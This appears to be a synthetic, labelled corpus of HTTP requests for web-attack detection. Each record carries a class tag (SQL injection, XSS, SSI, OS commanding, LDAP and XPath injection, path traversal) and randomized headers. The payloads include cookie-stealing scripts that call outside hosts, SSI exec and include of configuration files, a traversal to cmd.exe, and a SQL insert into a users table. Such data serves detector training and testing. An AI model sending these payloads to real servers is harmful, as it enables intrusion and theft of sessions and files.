Date: Sat, 27 Sep 08 19:54:15 UTC
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: eudloA@r7hlle0nht.it
If-Modified-Since: Sat, 19 Mar 05 14:56:26 CET
If-Unmodified-Since: Wed, 01 Aug 07 08:33:17 UTC
If-Match: "Io2f5Mr4Y3OTmUcqp"
If-None-Match: *
If-Range: Thu, 26 Jun 08 03:53:58 GMT
Max-Forwards: 43
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Basic eWVpZGFiOmxkbDdo
Range: -966,396-333,-3990
Referer: /3eMfw/scedtc/cdGte5n/dos6i/oayfdpu.fgf
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: oeuba (n_3pPhsyTq; ey0PhW1Q; vZeqB4; enITnVK0q; hcB-FLAU)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1475x116
Via: FTP/4.4 www.9Oom.shtml, 2.3 www.ypltTcd.css:8, 1.1 217.132.25.43
Transfer-Encoding: identity
Upgrade: Ia7/5.5, mnd/4.4, irt/6.7
Warning: 602 155.202.241.106 "ahmhtsCsahetnnil" 
X-Forwarded-For: 13.105.161.65
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42372
Start - Id: 42037
class: SqlInjection
GET /eamE/ge/hm/nh/ruaiXG9ynFuReN2G3s1.gif?lp8ot9otoein=kteedyGnhs&iNjnvEwtegea=hr40bMwAUfZ&EuttEei=787641&Llex=%3B++++EXEC%28+++%27INS%27%2B%27ERT+INTO++users+++++values%288%2C%27iN4Ete%27%2C%27heqoo%27+%29%29&nasA0irmeeieDb=8117100 HTTP/1.1
Host: www.nhoclan.cz
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-2, x-mac-turkish;q=0.9, windows-1257;q=0.1, windows-1253, x-mac-turkish
Accept-Encoding: deflate, identity;q=0.3, compress;q=0.5, identity;q=0.1
Accept-Language: *
Cache-Control: teotp='enuhaTe5'
Client-ip: 86.202.146.12
Cookie: wqhe8y1tf=awp-d<
Cookie2: $Version="76"
Date: Fri, 18 Mar 05 09:45:22 UTC
ETag: "_N1zf0lhG2wuFUyPI7"
Expect: htuts=nr7wu2he
From: idgece0c@Iierx.org
If-Modified-Since: Mon, 02 Apr 07 05:26:46 UTC
If-Unmodified-Since: Thu, 26 Aug 04 07:40:34 CET
If-Match: "1_Wf5Xo9DxXAFyBysP5"
If-None-Match: "kJ40R0p6FP.xEpZ"
If-Range: Mon, 15 Dec 08 04:20:27 UTC
Max-Forwards: 704
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: Digest nonce
Range: -69
Referer: http://www.drsqb.biz/rhijeae/3l7ifblo/popeidde/6citp1tp.gif
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 3.2; os-yn; rv:5.9.3) Gecko/23200945
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: MikdEe/2.9 www.dthomfF.shtml
Transfer-Encoding: msot; zwt2iob=igOehlSm
Upgrade: 9zntm/8.2, unrd/8.7, iGIo/4.8, tsi6b/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 3520691491140757
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42037
Start - Id: 47548
class: XSS
GET /otaFGSmetainputCM/5rshutdown1adminKORAzFHO3/logltv_whereC.F_21Q/nEL.sDw654_I.png?pfstdindbqIJ=xeo3p&eeddoelt=hgieo%7Cattu&YftpDgnull=%3C%21--+--+--%3E%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F203.152.46.252%2Fas.bin%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E%3C%21--+--+--%3E HTTP/1.1
Host: 247.187.74.146
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: eRslafpo-irs;q=0.1, wydms-haeomIk;q=0.2, 7ewr-la6dguss
Cache-Control: min-fresh=6368
Client-ip: 120.244.182.14
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Tue, 20 Dec 05 17:41:16 GMT
ETag: ".hOL6y3DPe6aw9Q5di1"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Mon, 21 Sep 09 24:29:51 CET
If-Unmodified-Since: Fri, 14 Jan 05 13:51:57 CET
If-Match: "eoyKEnb8nGT-xB-qzP"
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Fri, 06 Jul 07 20:31:04 GMT
Max-Forwards: 5310
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Basic Y21lbjpvbW9hc2U=
Range: 35190-213,56187-
Referer: http://i1odi.de/i0tt/acareA/sath4n/nhnn.jpeg
TE: gzip;q=0.8,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.7 (Windows; U; WinNT 7.5; r7-58; rv:8.5.4) Gecko/64572230
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: HTTP/3.0 245.57.233.254:3034, fsm4/8.0 www.oclhx.tiff
Transfer-Encoding: rqbcIi; ntkntoee=ioid
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47548
Start - Id: 39337
class: SSI
GET /okuAH1V8mok00P/i7aj5tpeO3tea/Hi405me/z./mA/Xe/gsheig0/rUi3ZKaTK0M8.css?Pxbgsound@9G=%3C%21--%23email+fromhost%3D%22www.gbonz5.com%22+tohost%3D%22mailbox.nah.com%22+message%3D%22en8te8+3ilwat+hane+hisre%22+fromaddress%3D%22msou.com%22+toaddress%3D%22i0fo.Wte.com%22+subject%3D%22o%22+sender%3D%22oe4s.com%22+replyto%3D%22ht1a7.com%22+cc%3D%22oku%22+inreplyto%3D%22teM2h+wli+nle0s%22+id%3D%22qtlmail%22+--%3E&diselae=t+3r&h6ga=lib HTTP/1.1
Host: www.ftxeeOga.net
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t-kaAgeue;q=0.1, aIenqoh-a;q=0.6, 3-sevD, s1Gtq-bp;q=0.5
Cache-Control: max-age=400
Client-ip: 153.213.53.71
Cookie: LMJ0BN6htpassmV=h"@"n;uotthoe=gensnooSnxtermteE;r6miife=kpd;theaTizCkeyuL=a\metxtr2v;eUjennhm=6;pneentdi7lc=rm\u
Cookie2: $Version="998"
Date: Fri, 19 Mar 10 15:17:23 UTC
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: utbrf
From: tuHdgsLz@bmsemyoDde.biz
If-Modified-Since: Fri, 28 Jul 06 17:30:15 CET
If-Unmodified-Since: Tue, 01 Jul 08 02:42:00 UTC
If-Match: "oYZRaQMJ1XaJ0Pa"
If-None-Match: "3mpmfDyxbeeWbZR"
If-Range: Sat, 29 May 04 03:58:58 UTC
Max-Forwards: 15
MIME-Version: 3.0
Pragma: nLeaestr=Smnoeir
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM b3RlZWw1dEVlZWVydVJyWWduQ2JhbjJ0Y3JubHJuZXNuZTIx
Range: 422767-,0924-,61697-47592
Referer: http://snhlgea.biz/5ntute7h/vznoyee/moiyReee/roe2Re.js
TE: deflate;q=0.1,gzip,chunked
Trailer: Connection
User-Agent: z@0zwoP http://www.icwy4.org
UA-CPU: Sparc
UA-Disp: 607,126,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: 1.9 116.134.112.243, 8.5 114.203.73.248:11, 9.2 www.ortnei.jpg
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39337
Start - Id: 43826
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.chhx.cz:80
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 110.26.184.172
Cookie: raddtpntme6otp=dns6unnohlimsamteo;d5=4ajtae
Cookie2: $Version="87"
Date: Wed, 06 Oct 04 07:39:20 UTC
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Fri, 09 Jul 04 02:07:55 UTC
If-Unmodified-Since: Tue, 20 Oct 09 06:48:05 CET
If-Match: "NK3rOA-0JT6ThHP4"
If-None-Match: "3VhEIW_17V@_HlM"
If-Range: Fri, 06 Apr 07 03:37:59 GMT
Max-Forwards: 477
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM bmV0cnVlSXdzdzFtbmYyZXhJaW1laGFSbW5qZXZ3SmNyZmFoMmI=
Range: -694,-90120,-768
Referer: /eatlp1Bh/HettZ5/uyecoh/1apE.jsp
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.6 (X11; U; Linux i386 1.3; ll-eA; rv:8.7.3) Gecko/66835645
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 7.3 www.eohnR.tiff, 5.2 88.65.214.58
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43826
Start - Id: 37353
class: LdapInjection
GET /hcws/nk4I/LW6oX_pgJMrhVC/pA7-NlHG/tk78by2SVMe/beedm/Obhjg/3dt/mIRwteaeh2tcN/txZ7qexemsCwe@Y/qy9KZAMUJ8DvD_/JgeUb0ARLW3.jsp?svrj00n=iehtiBvoovdeko&sshhroroR5Wc79=updatet&edioBsetenbia=3862&irtt=eoo&tMbP6sMn=3696052&uQwhereLcedy=ar8hm&tvnhsh=o5Ygay7a&oz4sny3eea=4&iOtrsstorn=%26h HTTP/1.0
Host: www.boa0triay.it
Connection: close
Accept: image/*;q=0.5, audio/basic;q=0.5, video/quicktime
Accept-Charset: iso-8859-1
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 216.207.233.187
Cookie: 3adxoet2n4lLo=57957;Neo=277724677;nwe=34319040
Cookie2: $Version="66"
Date: Sat, 29 Nov 08 20:17:14 UTC
ETag: "PLifDRTNtcaOX9r"
Expect: 100-continue
If-Modified-Since: Tue, 20 Oct 09 08:18:27 CET
If-Unmodified-Since: Wed, 27 Aug 08 20:37:49 CET
If-Match: *
If-None-Match: "rdWf0QrG6OAt63.4l3C"
If-Range: "a78gRMT@Gk3Nuow"
Max-Forwards: 890
MIME-Version: 8.7
Pragma: 6fqfcqR='alsaeb'
Proxy-Authorization: Digest uri=http://www.apmsiuyp.cz/Wrdfo/eamtufe/cmsjt.jsp
Authorization: Basic THVzcjpxZmxwVGV3cg==
Referer: http://cseen.com/enottn.swf
TE: trailers
Trailer: If-None-Match
User-Agent: )    (    |(displayName=had*)    (name    =    had* )(   mail=had*)
UA-Disp: 826,0920,16
UA-OS: Linux
UA-Pixels: 5121x090
Via: HTTP/1.8 26.245.213.203:2939, FTP/2.5 13.143.15.21
Transfer-Encoding: gzip
Upgrade: teelau/4.7, hbSn/7.7
Warning: 418 www.ul5cto.html "pI02zhe" 
X-Serial-Number: 3225774785
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37353
Start - Id: 49908
class: XPathInjection
GET /acutneen7hpgDcsOs/sestdincopymO5O6XXks/nQRl580Y9b1RQgxqo7no/3W9iDUakS/e3-lWHV@-Fc079E/nw/cfqH/ens9nfeifl/essLY3YS/ihc2dlGeiqhaEetuxsu.html?rgtm8yo=dlB&ufdthiEtlseh=oigdnose2x+aui&yupassthruInph-o-=eyynUgE-izt8&oi4earh=9187160&xriDie=c%3F&on40=556141&imhitOhnseCtmu=41&dna=023062&shutdownXwXn9Ju0n=ehtdhcm&aeoLBeeteteun=rGtl3s%27+++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++++%27Fjeo%27++++%3D++++%27 HTTP/1.0
Host: www.edGt.org
Connection: keep-alive
Accept: image/png, audio/x-wav;q=0.3
Accept-Charset: iso-8859-4;q=0.7, iso-8859-5;q=0.7, windows-1255;q=0.8
Accept-Encoding: deflate, deflate;q=0.7, deflate;q=0.4, identity
Accept-Language: dtiw-68its, a-ltik;q=0.3, aue-o, ft8i-Hnsy3aa, Wo4rdQz-b
Cache-Control: no-transform
Client-ip: 46.208.216.230
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="31"
Date: Thu, 27 Jan 05 15:53:45 CET
ETag: "-PkzT_C75R64usx5m"
Expect: 4rzr
If-Modified-Since: Mon, 20 Jul 09 22:26:40 UTC
If-Unmodified-Since: Fri, 26 May 06 17:34:31 CET
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: *
If-Range: *
Max-Forwards: 0865
MIME-Version: 7.7
Pragma: t2ttYE=mwmi
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: ia3b sara=5iwwpoh5
Range: 66338-
Referer: /Omw4/uEum/ohsfre/ewbe/4an0rtnn.tiff
User-Agent: NomT8emt5n4he45t
UA-Disp: 3308,0110,8
Via: 3.1 173.146.101.38
Transfer-Encoding: gzip
Upgrade: dnme4/8.5, Ima/0.8
X-Serial-Number: 70298520558
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49908
Start - Id: 35849
class: XPathInjection
GET /sPGMU2Flrs85j/an7apl/dEv323P2autoexecp-/sze3oaina1mgooeba3el/rvX8WC7I5PVFibCmNGRo/i9tRvd@Q6W@/deFH5iwTaotwgetQhD/p3otbnfeaie/aOP0-Pm.mdb?umAsl=rAHPWM1&eygin=500710&a7momftBsehee=56+or+++tuo8a3%2FltssR1%2Feie%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D61%5D+or++++8%3D&uiAaOn=said HTTP/1.1
Host: www.uoete6.it
Connection: aeava
Accept: */*;q=0.4
Accept-Charset: x-mac-cyrillic;q=0.1, big5
Accept-Encoding: *;q=0.7
Accept-Language: xatl-dttvngl;q=0.6
Cache-Control: r8sg='t'
Client-ip: 177.161.53.181
Cookie: roshst=ddhPeuuf'ara8;bvt=tuWeh;lPhdea=1243929390
Cookie2: $Version="398"
Date: Wed, 02 Feb 05 12:19:56 UTC
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: iasENO
From: wcsotyes@fnolepci.st
If-Modified-Since: Mon, 13 Dec 04 19:03:32 CET
If-Unmodified-Since: Fri, 14 Jan 05 21:20:23 CET
If-Match: "uVEX3euv.sny8oVnf5Sk"
If-None-Match: "@FW8yxa3Owe8fV_t"
If-Range: Sun, 29 Jan 06 04:01:31 UTC
Max-Forwards: 3501
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest username="ioula3"
Authorization: NTLM bnRvT2ppUlFhYmhwb25pdHU0b2NlZUZyMGVpaHJsYXllaXdvTmU=
Range: -15
Referer: http://tERpehBa.uk/YArSn/shce8/twae/u4bhdb.pl
TE: gzip,gzip
Trailer: Authorization
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 2.0; pd-to; rv:8.3.5) Gecko/69758552
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: HTTP/5.6 www.tct9dpg.gif
Transfer-Encoding: deflate
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35849
Start - Id: 47599
class: XSS
GET /aaeatn/e@wvSZxiJ0/s@ar/zbe8teAme3ewit/lj25tne/VJ0ac/lisnmyhYtoeiwNrtte/zrP_hTxWjYuf/aecwobeylaoFvsiohfcg/uqQbSMvMY/i02r3rAjY19tK8.html?Ao4=%26%3Cscript%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.onit.com%2Fcgi-bin%2Filelneic.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E HTTP/1.0
Host: 138.124.120.153
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-2022-kr, iso-8859-6;q=0.7, ks_c_5601-1987, koi8;q=0.9, iso-8859-15;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: N='honiaa'
Client-ip: 84.76.139.10
Cookie: eh=nShLD98;IUexecJPUWsystemY=4;aae=a7on;tezasrxihiie=lsdmteciSt gI;satt6ylhe=cT2X0;3N5KXqZ=h
Cookie2: $Version="867"
Date: Mon, 22 Mar 10 15:37:55 GMT
ETag: "XH4fCPIuXxAhkkU"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 11 Sep 05 24:25:46 GMT
If-Unmodified-Since: Wed, 04 May 05 14:48:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0230
MIME-Version: 8.3
Pragma: qshtAhwe=etbcne
Proxy-Authorization: Basic ZExnd3JkOlZhc2hlcnU=
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: /6osoaehi/riaholf.wav
TE: chunked,gzip,chunked
Trailer: TE
User-Agent: mJ5wheiY/9.4.7.0.2
UA-CPU: MIPS
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0399x875
Via: 2.8 40.37.142.166, 6.3 www.sbremu.tiff, 9.6 62.131.43.5
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47599
Start - Id: 39893
class: SSI
GET /t9uGP/tthe3wdGt.php4?Lpotisda=1904634611 HTTP/1.0
Host: 246.87.101.177:4
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: *;q=0.9
Accept-Language: aIbYr-gnt, tttpsbt-eDeklwt;q=0.4, 5t-t8rejr1o, esl-ds5Gde, aihr3n-rD;q=0.3
Cache-Control: min-fresh=30154
Client-ip: 63.192.249.56
Cookie: pI=h=esntucthc;btgtn=e|Pch;2DF2@gZphp=<!--   #exec     cmd="/bin/ls -l /home/s7aT6i7n/othbitsl"     -->
Cookie2: $Version="7"
Date: Wed, 11 Nov 09 04:32:42 GMT
ETag: W/"8a-074miQHiv3z70F"
Expect: 100-continue
From: hesirg7@ieucaapnt.de
If-Modified-Since: Sun, 02 Oct 05 10:26:53 UTC
If-Unmodified-Since: Fri, 26 Dec 08 20:34:43 CET
If-Match: "B.D.AjgaivLOP3HZuYGn"
If-None-Match: "PdYpxXEbZhUKSmrUf"
If-Range: Fri, 06 Jan 06 13:49:10 CET
Max-Forwards: 9954
MIME-Version: 6.9
Pragma: i=rA
Proxy-Authorization: Basic OHRlT3duZTpwYWVo
Authorization: Digest cnonce="soibee6"
Referer: /alclamb5.tar.gz
TE: gzip;q=0.8
Trailer: Range
User-Agent: extnj/1.3
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 328x4457
Via: 6.5 www.tcs9rZe.gif, HTTP/7.4 www.jlgyuwy.png:2343
Transfer-Encoding: h22z; adotlh0=oreo
Upgrade: uNei/9.5, eaa2h/6.9
Warning: 446 121.168.242.73 "eosus" 
----: ----------------------------------------

null

End - Id: 39893
Start - Id: 48686
class: XPathInjection
POST /-r7k4A/uY@/sweDPyrtrobhsdnWmd/2aKpaEcJ/aD7eEj/sxSxc.nPjvJaQ/hy2blr82gaeefhd/uh3TqHinPiframeYformX/eDzKHFaotmYRweGWw_/o-lzJzjPd.htm? HTTP/1.1
Content-Length: 203
Content-Language: 9soeht,eneLsErp,wdao
Content-Encoding: compress
Content-Location: /4yt0euea/apes/t1aiuY/n0ucgt.wav
Content-MD5: YWVsdllmeWh0OHJUblJkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 16 Apr 05 13:37:22 CET
Host: 187.28.172.235
Connection: keep-alive
Accept: audio/basic;q=0.3, application/postscript;q=0.6, video/*
Accept-Charset: windows-1251, x-mac-arabic, iso-8859-8-i;q=0.8, x-mac-turkish;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: nreHlY-ehhg
Cache-Control: no-cache
Client-ip: 187.92.28.4
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Tue, 16 Nov 04 18:52:13 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oIwoedct
If-Modified-Since: Mon, 30 Aug 04 02:38:40 UTC
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
If-Match: "f4@RrdbWzpGbtLPDUT"
If-None-Match: "B0.s7eF5cQlkD2Uw"
If-Range: Tue, 28 Dec 04 20:22:45 GMT
Max-Forwards: 131
Pragma: O64=uhud
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Referer: http://sTtmr.it/escar.pdf
User-Agent: Mozilla/6.6 (X11; U; Open BSD i586 8.8; ef-ci; rv:0.0.6) Gecko/89964535
UA-Color: color16
UA-Pixels: 640x9904
Via: 9.0 www.nEv2aeS.jpg
Transfer-Encoding: gzip
Upgrade: ereeos/7.6, tgr/8.5, 4idl/4.6, oth/2.8, Gpir/5.3
X-Serial-Number: 3185085450816900238

erebotsifd=de&tglom2zflxOsrpr=i&ylea=tnwgfth'     or   6 <     count(path/child::*) or    'eM'  ='&aIhoa=<eymIt1iy&ca2t2hhhsmAe5=476&btale=ersr%otsmoe&27eeshee8s=frow m7ciF)5t

End - Id: 48686
Start - Id: 40484
class: SSI
GET /i3prUdAU.8dmSFEx6/dneahutarbto/aPoapIer7le/eeTdttrydm3fTdzope2/hobhA/9J/4y/fejwvrdtte1/Grenph-rcpVt9S8/wO6n4Vb/hmUn70a2.mspx?oymgeysc5CSe=+g&LVXacceptwk1@uXexecV=%3C%21--+++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&tooeln=L%26eRincludes&ewC6Sb=eet1o0+%7Ecru6te&eto0harOb=lf%5Cneob%3DhOoo&V9G5X@=%40eaniuis%40etiTtn&YTCzmj03b8window.openZ=n5dE%40qS&rei2saBotEl=354817&noiia1Ee6tnj=e5gmsqonRa4daemt&sd3w7=2&esa8io=o1Woaspcusdss&OTKWF=60 HTTP/1.1
Host: 177.95.199.218:80
Connection: close
Accept: */*
Accept-Charset: euc-kr, x-mac-korean, euc-jp;q=0.1
Accept-Encoding: deflate;q=0.7, deflate, identity;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 178.48.213.72
Cookie: 299LlibI-E1=o oe;selretfdxeagonr=f8lsne-o;gti=tdeanu lr8n;ph4nayliec=tthrwtre0rtq
Cookie2: $Version="497"
Date: Mon, 11 Feb 08 02:59:34 UTC
ETag: "Cc_WWQ8J@_p@urD"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: "nEuMiCLc82-QfWlr7X"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.1
Pragma: dfurvn=r4e
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM aVRzd25zd3lpM0VhYUF1eXFlanp6bDNlZXBpNVpkcnpuaWJUZmE=
Range: -2,3-4,8136-
Referer: http://www.evoaeuwi.st/ugqtaPso.php4
TE: chunked,gzip
Trailer: Host
User-Agent: ypqivk6. http://www.bm1g.de
UA-CPU: PowerPC
UA-Disp: 609,4490,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0287x026
Via: ee8n/3.2 247.177.94.213, FTP/0.5 www.foMnu.tiff
Transfer-Encoding: gzip
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40484
Start - Id: 39832
class: SSI
GET /yco67isnteoLyoo/vusr2Ydori70jQFE_/jHz/S.H7GPXLDgeJep0a/sECZ/aGbx3WTBGcEcZiEO/sK4Aebi5ihUtv1_bj/2_6x@IUzxO70PdW8t1z/y3onbetweenloEVa7Va.png?aqeooAaihpan8E=e&.JV0fMMZ6@HD=%3C%21--+%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E HTTP/1.0
Host: 20.169.124.107
Connection: 2ezy
Accept: text/*;q=0.4
Accept-Charset: windows-1257, shift_jis;q=0.7, iso-8859-15, iso-8859-6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=35
Client-ip: 92.223.213.84
Cookie: eonoiy=hlrNhpieat;o8trnfnphJ=>~[wyr 0n;2ata=?l)y3;D_1v9KwfpositionnBU=oomtulwcIupdate scuage6e;cEo9nsUce=6
Cookie2: $Version="00"
Date: Sun, 08 Apr 07 08:59:04 CET
ETag: "63kQDQpII_6GCiFlfNX"
Expect: 100-continue
If-Modified-Since: Mon, 14 Jun 04 18:02:21 GMT
If-Unmodified-Since: Thu, 06 Apr 06 08:11:28 UTC
If-None-Match: "AOtD-Uiw2eZQ-obccV"
If-Range: *
Max-Forwards: 473
MIME-Version: 8.3
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: http://tya7.net/hNut/9aEpros/nveient4/cxiah.swf
TE: trailers
Trailer: Trailer
User-Agent: n1ecaeqnit26Lna2
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3110x4951
Via: 4.1 www.aropr.css
Transfer-Encoding: deflate
Upgrade: rds0ah/3.2, mnwu/5.1, odadh/5.8, dIbi/3.7, yeo8Te/3.1
X-Forwarded-For: 158.183.166.134
X-Serial-Number: 46103258544750968619
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 39832
Start - Id: 36128
class: PathTransversal
GET /tu9vjG/z4/2h/NL6x371execB/oeLZ_xU-gYHyge8FVHbu/iSRkiBtKZiph_a./xYdSJdRT3vHTfzCkABWu/eUDTt/Ss/hacTrLrn.aspx?yjAC4a=7253453&ehanashi6h=7og&tptmnb=ghMg%5Cegz+aso&neoritlA9T=802802&ueriere2clsiele=iGneuse&8n=Laop+&8a7=+ta&mRaziniEty=632&rd5=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fet%2Flani%2Fer%2Flltastnsar.pl&8dfTiL5onh=5187128&sS8BgA0ayxuO=Oa%25u+eaorriNc0q&tg4i=11802435&tprfee1=280021&rlT=s5aiu HTTP/1.1
Host: 12.42.232.240
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.7, identity, compress;q=0.5
Accept-Language: *;q=0.1
Cache-Control: min-fresh=86302
Client-ip: 183.58.216.100
Cookie: roi=2650526;rrAeq7etoyo1=eCt1oyeIusurewh;aawsnpalgnov7=tfEh
Cookie2: $Version="5"
Date: Tue, 16 Aug 05 12:09:49 GMT
ETag: "O@wdOljLOEMWn41hVasM"
Expect: ltosnt
From: dzgo@mzeta.ch
If-Modified-Since: Sat, 13 Nov 04 21:19:21 CET
If-Unmodified-Since: Fri, 04 Jun 04 03:37:11 CET
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "Tv2JiKlzGnxbj4t8"
If-Range: "A2JxszXcuc0p9dt-XP"
Max-Forwards: 655
MIME-Version: 5.0
Pragma: no-cache
